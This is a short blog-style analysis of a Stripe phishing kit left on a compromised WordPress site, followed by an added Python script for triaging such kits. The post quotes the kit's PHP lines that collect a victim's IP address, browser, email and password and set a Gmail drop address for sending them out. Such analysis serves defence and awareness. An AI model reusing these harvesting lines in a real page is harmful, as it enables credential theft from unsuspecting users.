hxxp://bitadze[.]ge/wp-includes/
The site was still wide open, so you could view the http.zip file and, in particular, the tfo.php file under the Stripe phish. That file is a good example of behind-the-scenes visibility into what an attacker does with your phished credentials after you enter your data and click submit on their malicious site.
As you can see, the attacker grabs your IP address
$ip = $_SERVER['REMOTE_ADDR'];
What browser you're using
$useragent = $_SERVER['HTTP_USER_AGENT'];
Your email & password
$message .= "EMAIL : ".$_POST['1KDL23']."\n";
$message .= "PASSWORD : ".$_POST['FZ32FEZ2345']."\n";
and sends it to himself
$send="fastpay147@gmail.com";
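The same reading of a recovered kit file can be automated during triage. The sketch below is an added example, not code from the kit or from the original post; the function names are hypothetical and the patterns assume the quoting and concatenation style of the tfo.php lines quoted above.

```python
import re

# The five lines quoted from tfo.php in the post above, reused as sample input.
SAMPLE = r'''
$ip = $_SERVER['REMOTE_ADDR'];
$useragent = $_SERVER['HTTP_USER_AGENT'];
$message .= "EMAIL : ".$_POST['1KDL23']."\n";
$message .= "PASSWORD : ".$_POST['FZ32FEZ2345']."\n";
$send="fastpay147@gmail.com";
'''

# Patterns assume the quoting and concatenation style seen in those lines.
SERVER_RE = re.compile(r"""\$_SERVER\[\s*['"]([A-Z_]+)['"]\s*\]""")
POST_RE = re.compile(r"""\$_(?:POST|REQUEST)\[\s*['"]([^'"]+)['"]\s*\]""")
LABEL_RE = re.compile(
    r"""["']\s*([A-Za-z][\w ]*?)\s*:\s*["']\s*\.\s*"""
    r"""\$_(?:POST|REQUEST)\[\s*['"]([^'"]+)['"]""")
EMAIL_RE = re.compile(r"""\$\w+\s*=\s*["']([\w.+-]+@[\w-]+(?:\.[\w-]+)+)["']""")


def defang(indicator):
    """Make an address non-clickable for reports, as the post does for the URL."""
    return indicator.replace("@", "[@]").replace(".", "[.]")


def triage_kit(php_source):
    """Summarise what a harvesting handler collects and where it is sent."""
    labels = {field: label for label, field in LABEL_RE.findall(php_source)}
    fields = {}
    for name in POST_RE.findall(php_source):
        # Obfuscated field names are mapped back to the kit's own label.
        fields.setdefault(name, labels.get(name))
    return {
        "server_vars": sorted(set(SERVER_RE.findall(php_source))),
        "form_fields": fields,
        "drop_addresses": sorted({defang(a) for a in EMAIL_RE.findall(php_source)}),
    }


if __name__ == "__main__":
    for key, value in triage_kit(SAMPLE).items():
        print(f"{key}: {value}")
```

A field with no adjacent label in the source is reported with a value of None, which flags it for manual review.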
Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.